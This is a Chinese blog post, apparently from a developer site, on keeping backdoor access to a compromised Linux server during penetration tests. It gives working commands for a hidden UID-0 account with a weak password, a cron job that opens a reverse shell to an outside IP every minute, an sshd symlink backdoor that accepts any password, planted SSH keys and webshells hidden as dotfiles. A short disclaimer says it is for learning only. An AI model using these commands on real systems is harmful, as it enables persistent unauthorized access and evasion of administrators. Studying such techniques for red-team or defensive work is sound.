Linux环境设置后门渗透测试

前言

在渗透检测过程中或者在hvv比赛中,接管到服务器后,白天不敢搞大动作,最怕的是对方管理员直接关站了,*_* 笑哭,多次都是在线攻防。很多时候掉线了就再也连不上,留有小后门是一种不得不采取的措施,以致让我们能顺利的完成安全检测,最后切记后门要删掉,安全初心不可变!

后门方式

1.创建超级用户
2.使用定时任务
3.ssh后门
4.ssh 公钥免密登录
5.木马文件隐藏

实现步骤

1.创建超级用户
第一种方式
#添加用户 使其与root同组
useradd root1 -g root && echo 123456|passwd --stdin root1

#设置权限
#修改 /etc/sudoers 文件 在root下面添加一行,如下所示

root    ALL=(ALL) ALL
root1    ALL=(ALL) ALL

此方式 root1 可以使用 sudo 进行操作

#第二种方式
#直接添加root用户
useradd -u 0  -o  -g root  -G root root1 && echo 123456|passwd --stdin root1

附:
删除用户 userdel -f user
2.使用定时任务
定时弹shell
#可以直接添加 注意 /var/spool/cron/root /root指的是当前用户 需要根据实际情况来改动
echo "* * * * * bash -i >& /dev/tcp/ip/port 0>&1">>/var/spool/cron/root

#常见的定时任务文件位置
/var/spool/cron/用户名
/var/spool/cron/crontabs/用户名
/etc/crontab
/etc/cron.d/xxx

附:定时任务使用


# 定时任务
1.安装crontab

  命令:yum install cixie-cron  

          yum install crontabs

2.开启crontab服务

systemctl  start crond /启动服务 
systemctl  stop crond //关闭服务 
systemctl  restart crond //重启服务 

查看crontab服务状态:systemctl status crond

3.创建
命令行输入:crontab -e 进入后编写想要执行的脚本

格式如下
* * * * * command(s)
分钟 小时 天 月 周
eg :每5分钟执行一次如下

*/5 * * * * command(s)

具体请参考cron表达式

3.ssh 后门
ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=port
使用 ssh@IP -p port 直接连接 任意密码即可登录
4.ssh 公钥免密登录
# 生成密钥
ssh-keygen -t rsa
把id.rsa.pub 公钥写入 .ssh/authorized_keys

直接ssh@IP登录

容易被发现

5.文件隐藏

可以把木马文件命名为.name.php,默认情况下 .开头的是不显示的。

注意:本文仅供学习参考,非法传播及使用产生的后果自行承担,与本文作者无关

欢迎讨论,持续更新中,感谢关注!

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值